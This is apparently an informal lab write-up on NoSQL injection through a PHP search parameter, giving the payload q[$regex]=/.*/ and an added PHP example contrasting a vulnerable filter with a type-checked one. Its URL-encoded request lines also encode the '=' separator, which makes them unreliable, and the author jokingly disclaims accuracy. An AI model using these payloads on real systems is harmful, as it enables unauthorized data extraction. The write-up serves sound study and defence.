welcome back to the struggle
I’m gonna start this one with a bit of an explainer (as far as I understand it, anyway) so your ass better be taking notes & learning
You know from the previous section, bypassing authentication, that you have to write whatever you’re trying to inject in PHP’s array parameter syntax. You know this as param: {$op: val} becoming param[$op]=val, so let’s map this onto our situation.
Our basic request looks like this
http://XX.XXX.XX.XX:PORT/?q=Keitt
We want to dump all the columns, so we want to send:
name: {$regex: /.*/}
So we change its format to match the php: param[$op]=val
name[$regex]=/.*/
Then url encode it to look like
name%5B%24regex%5D%3D%2F.*%2F
Then we send that bad boy and…
http://XX.XXX.XX.XX:PORT/?q=name%5B%24regex%5D%3D%2F.*%2F
It doesn’t work. We’ve instead gotta send it through a vulnerable search query, and for us that’s q. So we just replace ‘name’, which the server isn’t listening for, with q in the attack. This gives us:
http://XX.XXX.XX.XX:PORT/?q[$regex]=/.*/
Don’t forget to encode!
http://XX.XXX.XX.XX:PORT/?q%5B%24regex%5D%3D%2F.*%2F
This dumps all the columns (hooray) and you get to move onto the horrors of blind data extraction :)))
So remember!!! You gotta get your little checklist together and figure out 1) where to inject into the vulnerable search query, 2) whatcha gonna query & 3) how to url encode that bad boy properly
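To see why the bracket syntax matters on the server side, here is an added example (not code from the post or from the target app) that runs PHP’s own query-string parsing over the two requests above, then shows the filter shape that lets the array through next to the type check that stops it. The field name `name` and the `q` parameter are taken from the post; the two handler functions are assumptions.

```php
<?php
// Added example, not the post's or the target app's code.
// Constructed query strings: the normal search and the injected form from the post.
$queries = [
    'q=Keitt',
    'q[$regex]=/.*/',
];

foreach ($queries as $qs) {
    parse_str($qs, $params);   // the same parsing PHP uses to populate $_GET
    echo $qs, ' -> ', var_export($params['q'], true), PHP_EOL;
}

// Vulnerable shape (assumed handler): the parameter goes straight into the
// filter, so an array value arrives at MongoDB as an operator document.
function unsafeFilter(array $get): array
{
    return ['name' => $get['q']];
}

// Hardened shape (assumed handler): only a scalar string is accepted, so the
// client cannot turn the filter value into an operator object, however it
// encodes the URL. Rejecting the request is safer than casting, because a
// cast hides the fact that someone is probing the parameter.
function safeFilter(array $get): array
{
    if (!isset($get['q']) || !is_string($get['q'])) {
        throw new InvalidArgumentException('q must be a plain string');
    }
    return ['name' => $get['q']];
}

parse_str('q[$regex]=/.*/', $attack);
echo 'unsafe filter: ', var_export(unsafeFilter($attack), true), PHP_EOL;

try {
    safeFilter($attack);
} catch (InvalidArgumentException $e) {
    echo 'safe filter rejected it: ', $e->getMessage(), PHP_EOL;
}
```

Run it with `php example.php`; the first loop prints a plain string for the normal search and a nested array for the injected one, which is the whole trick in one line of output.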
I got kinda stuck on this because I wasn’t sure where to inject lmao so if this helps with your learning that’s sick as hell. Anyway dude I like to tell lies & spread misinformation on the internet so do ur own research 🙂